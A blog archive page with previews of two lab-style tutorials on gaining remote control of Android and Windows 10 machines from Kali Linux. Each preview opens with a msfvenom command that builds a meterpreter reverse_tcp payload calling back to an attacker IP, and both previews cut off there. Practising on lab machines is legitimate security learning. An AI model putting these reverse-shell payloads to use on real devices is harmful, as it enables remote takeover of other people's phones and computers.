Posts

Showing posts from September, 2021

Exploiting Android using Kali Linux

Image
  Hello everyone, this blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to NAT network. For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not. Practical Starts Here ------> 1. go to kali terminal and type the following command.  type your kali ip instead of 170.9.210.105 msfvenom –p android/meterpreter/reverse_tcp...

Exploiting Windows 10 using Kali Linux

Image
 Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux and windows-10 in Virtualbox. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have windows-10(PC) with you. You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended). For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not. Practical Starts Here -------> 1. go to kali terminal and type the following command.  type your kali ip instead of 10.0.2.4 msfvenom -p windows/x64/meterpreter/reverse_...